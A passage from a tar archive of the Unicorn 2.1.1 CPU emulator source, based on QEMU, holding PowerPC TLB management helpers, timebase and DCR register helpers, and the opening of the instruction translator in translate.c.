TLBnCFG_IPROT)) { /* no IPROT supported by TLB */ tlb->mas1 &= ~MAS1_IPROT; } flush_page(env, tlb); } static inline void booke206_tlb_to_mas(CPUPPCState *env, ppcmas_tlb_t *tlb) { int tlbn = booke206_tlbm_to_tlbn(env, tlb); int way = booke206_tlbm_to_way(env, tlb); env->spr[SPR_BOOKE_MAS0] = tlbn << MAS0_TLBSEL_SHIFT; env->spr[SPR_BOOKE_MAS0] |= way << MAS0_ESEL_SHIFT; env->spr[SPR_BOOKE_MAS0] |= env->last_way << MAS0_NV_SHIFT; env->spr[SPR_BOOKE_MAS1] = tlb->mas1; env->spr[SPR_BOOKE_MAS2] = tlb->mas2; env->spr[SPR_BOOKE_MAS3] = tlb->mas7_3; env->spr[SPR_BOOKE_MAS7] = tlb->mas7_3 >> 32; } void helper_booke206_tlbre(CPUPPCState *env) { ppcmas_tlb_t *tlb = NULL; tlb = booke206_cur_tlb(env); if (!tlb) { env->spr[SPR_BOOKE_MAS1] = 0; } else { booke206_tlb_to_mas(env, tlb); } } void helper_booke206_tlbsx(CPUPPCState *env, target_ulong address) { ppcmas_tlb_t *tlb = NULL; int i, j; hwaddr raddr; uint32_t spid, sas; spid = (env->spr[SPR_BOOKE_MAS6] & MAS6_SPID_MASK) >> MAS6_SPID_SHIFT; sas = env->spr[SPR_BOOKE_MAS6] & MAS6_SAS; for (i = 0; i < BOOKE206_MAX_TLBN; i++) { int ways = booke206_tlb_ways(env, i); for (j = 0; j < ways; j++) { tlb = booke206_get_tlbm(env, i, address, j); if (!tlb) { continue; } if (ppcmas_tlb_check(env, tlb, &raddr, address, spid)) { continue; } if (sas != ((tlb->mas1 & MAS1_TS) >> MAS1_TS_SHIFT)) { continue; } booke206_tlb_to_mas(env, tlb); return; } } /* no entry found, fill with defaults */ env->spr[SPR_BOOKE_MAS0] = env->spr[SPR_BOOKE_MAS4] & MAS4_TLBSELD_MASK; env->spr[SPR_BOOKE_MAS1] = env->spr[SPR_BOOKE_MAS4] & MAS4_TSIZED_MASK; env->spr[SPR_BOOKE_MAS2] = env->spr[SPR_BOOKE_MAS4] & MAS4_WIMGED_MASK; env->spr[SPR_BOOKE_MAS3] = 0; env->spr[SPR_BOOKE_MAS7] = 0; if (env->spr[SPR_BOOKE_MAS6] & MAS6_SAS) { env->spr[SPR_BOOKE_MAS1] |= MAS1_TS; } env->spr[SPR_BOOKE_MAS1] |= (env->spr[SPR_BOOKE_MAS6] >> 16) << MAS1_TID_SHIFT; /* next victim logic */ env->spr[SPR_BOOKE_MAS0] |= env->last_way << MAS0_ESEL_SHIFT; env->last_way++; env->last_way &= booke206_tlb_ways(env, 0) - 1; env->spr[SPR_BOOKE_MAS0] |= env->last_way << MAS0_NV_SHIFT; } static inline void booke206_invalidate_ea_tlb(CPUPPCState *env, int tlbn, uint32_t ea) { int i; int ways = booke206_tlb_ways(env, tlbn); target_ulong mask; for (i = 0; i < ways; i++) { ppcmas_tlb_t *tlb = booke206_get_tlbm(env, tlbn, ea, i); if (!tlb) { continue; } mask = ~(booke206_tlb_to_page_size(env, tlb) - 1); if (((tlb->mas2 & MAS2_EPN_MASK) == (ea & mask)) && !(tlb->mas1 & MAS1_IPROT)) { tlb->mas1 &= ~MAS1_VALID; } } } void helper_booke206_tlbivax(CPUPPCState *env, target_ulong address) { CPUState *cs = env_cpu(env); if (address & 0x4) { /* flush all entries */ if (address & 0x8) { /* flush all of TLB1 */ booke206_flush_tlb(env, BOOKE206_FLUSH_TLB1, 1); } else { /* flush all of TLB0 */ booke206_flush_tlb(env, BOOKE206_FLUSH_TLB0, 0); } return; } if (address & 0x8) { /* flush TLB1 entries */ booke206_invalidate_ea_tlb(env, 1, address); tlb_flush(cs); } else { /* flush TLB0 entries */ booke206_invalidate_ea_tlb(env, 0, address); tlb_flush_page(cs, address & MAS2_EPN_MASK); } } void helper_booke206_tlbilx0(CPUPPCState *env, target_ulong address) { /* XXX missing LPID handling */ booke206_flush_tlb(env, -1, 1); } void helper_booke206_tlbilx1(CPUPPCState *env, target_ulong address) { int i, j; int tid = (env->spr[SPR_BOOKE_MAS6] & MAS6_SPID); ppcmas_tlb_t *tlb = env->tlb.tlbm; int tlb_size; /* XXX missing LPID handling */ for (i = 0; i < BOOKE206_MAX_TLBN; i++) { tlb_size = booke206_tlb_size(env, i); for (j = 0; j < tlb_size; j++) { if (!(tlb[j].mas1 & MAS1_IPROT) && ((tlb[j].mas1 & MAS1_TID_MASK) == tid)) { tlb[j].mas1 &= ~MAS1_VALID; } } tlb += booke206_tlb_size(env, i); } tlb_flush(env_cpu(env)); } void helper_booke206_tlbilx3(CPUPPCState *env, target_ulong address) { int i, j; ppcmas_tlb_t *tlb; int tid = (env->spr[SPR_BOOKE_MAS6] & MAS6_SPID); int pid = tid >> MAS6_SPID_SHIFT; int sgs = env->spr[SPR_BOOKE_MAS5] & MAS5_SGS; int ind = (env->spr[SPR_BOOKE_MAS6] & MAS6_SIND) ? MAS1_IND : 0; /* XXX check for unsupported isize and raise an invalid opcode then */ int size = env->spr[SPR_BOOKE_MAS6] & MAS6_ISIZE_MASK; /* XXX implement MAV2 handling */ bool mav2 = false; /* XXX missing LPID handling */ /* flush by pid and ea */ for (i = 0; i < BOOKE206_MAX_TLBN; i++) { int ways = booke206_tlb_ways(env, i); for (j = 0; j < ways; j++) { tlb = booke206_get_tlbm(env, i, address, j); if (!tlb) { continue; } if ((ppcmas_tlb_check(env, tlb, NULL, address, pid) != 0) || (tlb->mas1 & MAS1_IPROT) || ((tlb->mas1 & MAS1_IND) != ind) || ((tlb->mas8 & MAS8_TGS) != sgs)) { continue; } if (mav2 && ((tlb->mas1 & MAS1_TSIZE_MASK) != size)) { /* XXX only check when MMUCFG[TWC] || TLBnCFG[HES] */ continue; } /* XXX e500mc doesn't match SAS, but other cores might */ tlb->mas1 &= ~MAS1_VALID; } } tlb_flush(env_cpu(env)); } void helper_booke206_tlbflush(CPUPPCState *env, target_ulong type) { int flags = 0; if (type & 2) { flags |= BOOKE206_FLUSH_TLB1; } if (type & 4) { flags |= BOOKE206_FLUSH_TLB0; } booke206_flush_tlb(env, flags, 1); } void helper_check_tlb_flush_local(CPUPPCState *env) { check_tlb_flush(env, false); } void helper_check_tlb_flush_global(CPUPPCState *env) { check_tlb_flush(env, true); } /*****************************************************************************/ bool ppc_cpu_tlb_fill(CPUState *cs, vaddr addr, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { PowerPCCPU *cpu = POWERPC_CPU(cs); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cs); CPUPPCState *env = &cpu->env; int ret; if (pcc->handle_mmu_fault) { ret = pcc->handle_mmu_fault(cpu, addr, access_type, mmu_idx); } else { ret = cpu_ppc_handle_mmu_fault(env, addr, access_type, mmu_idx); } if (unlikely(ret != 0)) { if (probe) { return false; } raise_exception_err_ra(env, cs->exception_index, env->error_code, retaddr); } return true; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/timebase_helper.c�����������������������������������������������������0000664�0000000�0000000�00000012302�14675241067�0021515�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" /*****************************************************************************/ /* SPR accesses */ target_ulong helper_load_tbl(CPUPPCState *env) { return (target_ulong)cpu_ppc_load_tbl(env); } target_ulong helper_load_tbu(CPUPPCState *env) { return cpu_ppc_load_tbu(env); } target_ulong helper_load_atbl(CPUPPCState *env) { return (target_ulong)cpu_ppc_load_atbl(env); } target_ulong helper_load_atbu(CPUPPCState *env) { return cpu_ppc_load_atbu(env); } target_ulong helper_load_vtb(CPUPPCState *env) { return cpu_ppc_load_vtb(env); } #if defined(TARGET_PPC64) target_ulong helper_load_purr(CPUPPCState *env) { return (target_ulong)cpu_ppc_load_purr(env); } void helper_store_purr(CPUPPCState *env, target_ulong val) { cpu_ppc_store_purr(env, val); } #endif target_ulong helper_load_601_rtcl(CPUPPCState *env) { return cpu_ppc601_load_rtcl(env); } target_ulong helper_load_601_rtcu(CPUPPCState *env) { return cpu_ppc601_load_rtcu(env); } void helper_store_tbl(CPUPPCState *env, target_ulong val) { cpu_ppc_store_tbl(env, val); } void helper_store_tbu(CPUPPCState *env, target_ulong val) { cpu_ppc_store_tbu(env, val); } void helper_store_atbl(CPUPPCState *env, target_ulong val) { cpu_ppc_store_atbl(env, val); } void helper_store_atbu(CPUPPCState *env, target_ulong val) { cpu_ppc_store_atbu(env, val); } void helper_store_601_rtcl(CPUPPCState *env, target_ulong val) { cpu_ppc601_store_rtcl(env, val); } void helper_store_601_rtcu(CPUPPCState *env, target_ulong val) { cpu_ppc601_store_rtcu(env, val); } target_ulong helper_load_decr(CPUPPCState *env) { return cpu_ppc_load_decr(env); } void helper_store_decr(CPUPPCState *env, target_ulong val) { cpu_ppc_store_decr(env, val); } target_ulong helper_load_hdecr(CPUPPCState *env) { return cpu_ppc_load_hdecr(env); } void helper_store_hdecr(CPUPPCState *env, target_ulong val) { cpu_ppc_store_hdecr(env, val); } void helper_store_vtb(CPUPPCState *env, target_ulong val) { cpu_ppc_store_vtb(env, val); } void helper_store_tbu40(CPUPPCState *env, target_ulong val) { cpu_ppc_store_tbu40(env, val); } target_ulong helper_load_40x_pit(CPUPPCState *env) { return load_40x_pit(env); } void helper_store_40x_pit(CPUPPCState *env, target_ulong val) { store_40x_pit(env, val); } void helper_store_booke_tcr(CPUPPCState *env, target_ulong val) { store_booke_tcr(env, val); } void helper_store_booke_tsr(CPUPPCState *env, target_ulong val) { store_booke_tsr(env, val); } /*****************************************************************************/ /* Embedded PowerPC specific helpers */ /* XXX: to be improved to check access rights when in user-mode */ target_ulong helper_load_dcr(CPUPPCState *env, target_ulong dcrn) { uint32_t val = 0; if (unlikely(env->dcr_env == NULL)) { qemu_log_mask(LOG_GUEST_ERROR, "No DCR environment\n"); raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_INVAL_INVAL, GETPC()); } else { int ret; ret = ppc_dcr_read(env->dcr_env, (uint32_t)dcrn, &val); if (unlikely(ret != 0)) { #if 0 qemu_log_mask(LOG_GUEST_ERROR, "DCR read error %d %03x\n", (uint32_t)dcrn, (uint32_t)dcrn); #endif raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_PRIV_REG, GETPC()); } } return val; } void helper_store_dcr(CPUPPCState *env, target_ulong dcrn, target_ulong val) { if (unlikely(env->dcr_env == NULL)) { #if 0 qemu_log_mask(LOG_GUEST_ERROR, "No DCR environment\n"); #endif raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_INVAL_INVAL, GETPC()); } else { int ret; ret = ppc_dcr_write(env->dcr_env, (uint32_t)dcrn, (uint32_t)val); if (unlikely(ret != 0)) { #if 0 qemu_log_mask(LOG_GUEST_ERROR, "DCR write error %d %03x\n", (uint32_t)dcrn, (uint32_t)dcrn); #endif raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_PRIV_REG, GETPC()); } } } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/translate.c�����������������������������������������������������������0000664�0000000�0000000�00001037320�14675241067�0020372�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC emulation for qemu: main translation routines. * * Copyright (c) 2003-2007 Jocelyn Mayer * Copyright (C) 2011 Freescale Semiconductor, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "tcg/tcg-op-gvec.h" #include "qemu/host-utils.h" #include "exec/cpu_ldst.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "exec/translator.h" #include "qemu/atomic128.h" #define CPU_SINGLE_STEP 0x1 #define CPU_BRANCH_STEP 0x2 #define GDBSTUB_SINGLE_STEP 0x4 /* Include definitions for instructions classes and implementations flags */ /* #define PPC_DEBUG_DISAS */ /* #define DO_PPC_STATISTICS */ #ifdef PPC_DEBUG_DISAS # define LOG_DISAS(...) qemu_log_mask(CPU_LOG_TB_IN_ASM, ## __VA_ARGS__) #else # define LOG_DISAS(...) do { } while (0) #endif /*****************************************************************************/ /* Code translation helpers */ /* global register indexes */ static char cpu_reg_names[10 * 3 + 22 * 4 /* GPR */ + 10 * 4 + 22 * 5 /* SPE GPRh */ + 8 * 5 /* CRF */]; static TCGv cpu_gpr[32]; static TCGv cpu_gprh[32]; static TCGv_i32 cpu_crf[8]; static TCGv cpu_nip; static TCGv cpu_msr; static TCGv cpu_ctr; static TCGv cpu_lr; #if defined(TARGET_PPC64) static TCGv cpu_cfar; #endif static TCGv cpu_xer, cpu_so, cpu_ov, cpu_ca, cpu_ov32, cpu_ca32; static TCGv cpu_reserve; static TCGv cpu_reserve_val; static TCGv cpu_fpscr; static TCGv_i32 cpu_access_type; #include "exec/gen-icount.h" void ppc_translate_init(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; int i; char *p; size_t cpu_reg_names_size; p = cpu_reg_names; cpu_reg_names_size = sizeof(cpu_reg_names); for (i = 0; i < 8; i++) { snprintf(p, cpu_reg_names_size, "crf%d", i); cpu_crf[i] = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, crf[i]), p); p += 5; cpu_reg_names_size -= 5; } for (i = 0; i < 32; i++) { snprintf(p, cpu_reg_names_size, "r%d", i); cpu_gpr[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, gpr[i]), p); p += (i < 10) ? 3 : 4; cpu_reg_names_size -= (i < 10) ? 3 : 4; snprintf(p, cpu_reg_names_size, "r%dH", i); cpu_gprh[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, gprh[i]), p); p += (i < 10) ? 4 : 5; cpu_reg_names_size -= (i < 10) ? 4 : 5; } cpu_nip = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, nip), "nip"); cpu_msr = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, msr), "msr"); cpu_ctr = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, ctr), "ctr"); cpu_lr = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, lr), "lr"); #if defined(TARGET_PPC64) cpu_cfar = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, cfar), "cfar"); #endif cpu_xer = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, xer), "xer"); cpu_so = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, so), "SO"); cpu_ov = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, ov), "OV"); cpu_ca = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, ca), "CA"); cpu_ov32 = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, ov32), "OV32"); cpu_ca32 = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, ca32), "CA32"); cpu_reserve = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, reserve_addr), "reserve_addr"); cpu_reserve_val = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, reserve_val), "reserve_val"); cpu_fpscr = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, fpscr), "fpscr"); cpu_access_type = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUPPCState, access_type), "access_type"); } /* internal defines */ struct DisasContext { DisasContextBase base; uint32_t opcode; uint32_t exception; /* Routine used to access memory */ bool pr, hv, dr, le_mode; bool lazy_tlb_flush; bool need_access_type; int mem_idx; int access_type; /* Translation flags */ MemOp default_tcg_memop_mask; #if defined(TARGET_PPC64) bool sf_mode; bool has_cfar; #endif bool fpu_enabled; bool altivec_enabled; bool vsx_enabled; bool spe_enabled; bool tm_enabled; bool gtse; ppc_spr_t *spr_cb; /* Needed to check rights for mfspr/mtspr */ int singlestep_enabled; uint32_t flags; uint64_t insns_flags; uint64_t insns_flags2; // Unicorn struct uc_struct *uc; }; /* Return true iff byteswap is needed in a scalar memop */ static inline bool need_byteswap(const DisasContext *ctx) { #if defined(TARGET_WORDS_BIGENDIAN) return ctx->le_mode; #else return !ctx->le_mode; #endif } /* True when active word size < size of target_long. */ #ifdef TARGET_PPC64 # define NARROW_MODE(C) (!(C)->sf_mode) #else # define NARROW_MODE(C) 0 #endif struct opc_handler_t { /* invalid bits for instruction 1 (Rc(opcode) == 0) */ uint32_t inval1; /* invalid bits for instruction 2 (Rc(opcode) == 1) */ uint32_t inval2; /* instruction type */ uint64_t type; /* extended instruction type */ uint64_t type2; /* handler */ void (*handler)(DisasContext *ctx); #if defined(DO_PPC_STATISTICS) || defined(PPC_DUMP_CPU) const char *oname; #endif #if defined(DO_PPC_STATISTICS) uint64_t count; #endif }; /* SPR load/store helpers */ static inline void gen_load_spr(TCGContext *tcg_ctx, TCGv t, int reg) { tcg_gen_ld_tl(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUPPCState, spr[reg])); } static inline void gen_store_spr(TCGContext *tcg_ctx, int reg, TCGv t) { tcg_gen_st_tl(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUPPCState, spr[reg])); } static inline void gen_set_access_type(DisasContext *ctx, int access_type) { if (ctx->need_access_type && ctx->access_type != access_type) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_i32(tcg_ctx, cpu_access_type, access_type); ctx->access_type = access_type; } } static inline void gen_update_nip(DisasContext *ctx, target_ulong nip) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (NARROW_MODE(ctx)) { nip = (uint32_t)nip; } tcg_gen_movi_tl(tcg_ctx, cpu_nip, nip); } static void gen_exception_err(DisasContext *ctx, uint32_t excp, uint32_t error) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0, t1; /* * These are all synchronous exceptions, we set the PC back to the * faulting instruction */ if (ctx->exception == POWERPC_EXCP_NONE) { gen_update_nip(ctx, ctx->base.pc_next - 4); } t0 = tcg_const_i32(tcg_ctx, excp); t1 = tcg_const_i32(tcg_ctx, error); #ifdef UNICORN_ARCH_POSTFIX glue(gen_helper_raise_exception_err, UNICORN_ARCH_POSTFIX)(tcg_ctx, tcg_ctx->cpu_env, t0, t1); #else gen_helper_raise_exception_err(tcg_ctx, tcg_ctx->cpu_env, t0, t1); #endif tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); ctx->exception = (excp); } static void gen_exception(DisasContext *ctx, uint32_t excp) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; /* * These are all synchronous exceptions, we set the PC back to the * faulting instruction */ if (ctx->exception == POWERPC_EXCP_NONE) { gen_update_nip(ctx, ctx->base.pc_next - 4); } t0 = tcg_const_i32(tcg_ctx, excp); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); ctx->exception = (excp); } static void gen_exception_nip(DisasContext *ctx, uint32_t excp, target_ulong nip) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; gen_update_nip(ctx, nip); t0 = tcg_const_i32(tcg_ctx, excp); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); ctx->exception = (excp); } /* * Tells the caller what is the appropriate exception to generate and prepares * SPR registers for this exception. * * The exception can be either POWERPC_EXCP_TRACE (on most PowerPCs) or * POWERPC_EXCP_DEBUG (on BookE). */ static uint32_t gen_prep_dbgex(DisasContext *ctx) { if (ctx->flags & POWERPC_FLAG_DE) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong dbsr = 0; if (ctx->singlestep_enabled & CPU_SINGLE_STEP) { dbsr = DBCR0_ICMP; } else { /* Must have been branch */ dbsr = DBCR0_BRT; } TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_spr(tcg_ctx, t0, SPR_BOOKE_DBSR); tcg_gen_ori_tl(tcg_ctx, t0, t0, dbsr); gen_store_spr(tcg_ctx, SPR_BOOKE_DBSR, t0); tcg_temp_free(tcg_ctx, t0); return POWERPC_EXCP_DEBUG; } else { return POWERPC_EXCP_TRACE; } } static void gen_debug_exception(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; /* * These are all synchronous exceptions, we set the PC back to the * faulting instruction */ if ((ctx->exception != POWERPC_EXCP_BRANCH) && (ctx->exception != POWERPC_EXCP_SYNC)) { gen_update_nip(ctx, ctx->base.pc_next); } t0 = tcg_const_i32(tcg_ctx, EXCP_DEBUG); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); } static inline void gen_inval_exception(DisasContext *ctx, uint32_t error) { /* Will be converted to program check if needed */ gen_exception_err(ctx, POWERPC_EXCP_HV_EMU, POWERPC_EXCP_INVAL | error); } static inline void gen_priv_exception(DisasContext *ctx, uint32_t error) { gen_exception_err(ctx, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_PRIV | error); } static inline void gen_hvpriv_exception(DisasContext *ctx, uint32_t error) { /* Will be converted to program check if needed */ gen_exception_err(ctx, POWERPC_EXCP_HV_EMU, POWERPC_EXCP_PRIV | error); } /* Stop translation */ static inline void gen_stop_exception(DisasContext *ctx) { gen_update_nip(ctx, ctx->base.pc_next); ctx->exception = POWERPC_EXCP_STOP; } /* No need to update nip here, as execution flow will change */ static inline void gen_sync_exception(DisasContext *ctx) { ctx->exception = POWERPC_EXCP_SYNC; } #define GEN_HANDLER(name, opc1, opc2, opc3, inval, type) \ GEN_OPCODE(name, opc1, opc2, opc3, inval, type, PPC_NONE) #define GEN_HANDLER_E(name, opc1, opc2, opc3, inval, type, type2) \ GEN_OPCODE(name, opc1, opc2, opc3, inval, type, type2) #define GEN_HANDLER2(name, onam, opc1, opc2, opc3, inval, type) \ GEN_OPCODE2(name, onam, opc1, opc2, opc3, inval, type, PPC_NONE) #define GEN_HANDLER2_E(name, onam, opc1, opc2, opc3, inval, type, type2) \ GEN_OPCODE2(name, onam, opc1, opc2, opc3, inval, type, type2) #define GEN_HANDLER_E_2(name, opc1, opc2, opc3, opc4, inval, type, type2) \ GEN_OPCODE3(name, opc1, opc2, opc3, opc4, inval, type, type2) #define GEN_HANDLER2_E_2(name, onam, opc1, opc2, opc3, opc4, inval, typ, typ2) \ GEN_OPCODE4(name, onam, opc1, opc2, opc3, opc4, inval, typ, typ2) typedef struct opcode_t { unsigned char opc1, opc2, opc3, opc4; #if HOST_LONG_BITS == 64 /* Explicitly align to 64 bits */ unsigned char pad[4]; #endif opc_handler_t handler; const char *oname; } opcode_t; /* Helpers for priv. check */ #define GEN_PRIV \ do { \ gen_priv_exception(ctx, POWERPC_EXCP_PRIV_OPC); return; \ } while (0) #define CHK_HV \ do { \ if (unlikely(ctx->pr || !ctx->hv)) { \ GEN_PRIV; \ } \ } while (0) #define CHK_SV \ do { \ if (unlikely(ctx->pr)) { \ GEN_PRIV; \ } \ } while (0) #define CHK_HVRM \ do { \ if (unlikely(ctx->pr || !ctx->hv || ctx->dr)) { \ GEN_PRIV; \ } \ } while (0) #define CHK_NONE /*****************************************************************************/ /* PowerPC instructions table */ #if defined(DO_PPC_STATISTICS) #define GEN_OPCODE(name, op1, op2, op3, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = 0xff, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ .oname = stringify(name), \ }, \ .oname = stringify(name), \ } #define GEN_OPCODE_DUAL(name, op1, op2, op3, invl1, invl2, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = 0xff, \ .handler = { \ .inval1 = invl1, \ .inval2 = invl2, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ .oname = stringify(name), \ }, \ .oname = stringify(name), \ } #define GEN_OPCODE2(name, onam, op1, op2, op3, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = 0xff, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ .oname = onam, \ }, \ .oname = onam, \ } #define GEN_OPCODE3(name, op1, op2, op3, op4, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = op4, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ .oname = stringify(name), \ }, \ .oname = stringify(name), \ } #define GEN_OPCODE4(name, onam, op1, op2, op3, op4, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = op4, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ .oname = onam, \ }, \ .oname = onam, \ } #else #define GEN_OPCODE(name, op1, op2, op3, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = 0xff, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ }, \ .oname = stringify(name), \ } #define GEN_OPCODE_DUAL(name, op1, op2, op3, invl1, invl2, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = 0xff, \ .handler = { \ .inval1 = invl1, \ .inval2 = invl2, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ }, \ .oname = stringify(name), \ } #define GEN_OPCODE2(name, onam, op1, op2, op3, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = 0xff, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ }, \ .oname = onam, \ } #define GEN_OPCODE3(name, op1, op2, op3, op4, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = op4, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ }, \ .oname = stringify(name), \ } #define GEN_OPCODE4(name, onam, op1, op2, op3, op4, invl, _typ, _typ2) \ { \ .opc1 = op1, \ .opc2 = op2, \ .opc3 = op3, \ .opc4 = op4, \ .handler = { \ .inval1 = invl, \ .type = _typ, \ .type2 = _typ2, \ .handler = &gen_##name, \ }, \ .oname = onam, \ } #endif /* Invalid instruction */ static void gen_invalid(DisasContext *ctx) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } static opc_handler_t invalid_handler = { .inval1 = 0xFFFFFFFF, .inval2 = 0xFFFFFFFF, .type = PPC_NONE, .type2 = PPC_NONE, .handler = gen_invalid, }; /*** Integer comparison ***/ static inline void gen_op_cmp(TCGContext *tcg_ctx, TCGv arg0, TCGv arg1, int s, int crf) { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t0, CRF_EQ); tcg_gen_movi_tl(tcg_ctx, t1, CRF_LT); tcg_gen_movcond_tl(tcg_ctx, (s ? TCG_COND_LT : TCG_COND_LTU), t0, arg0, arg1, t1, t0); tcg_gen_movi_tl(tcg_ctx, t1, CRF_GT); tcg_gen_movcond_tl(tcg_ctx, (s ? TCG_COND_GT : TCG_COND_GTU), t0, arg0, arg1, t1, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t, t0); 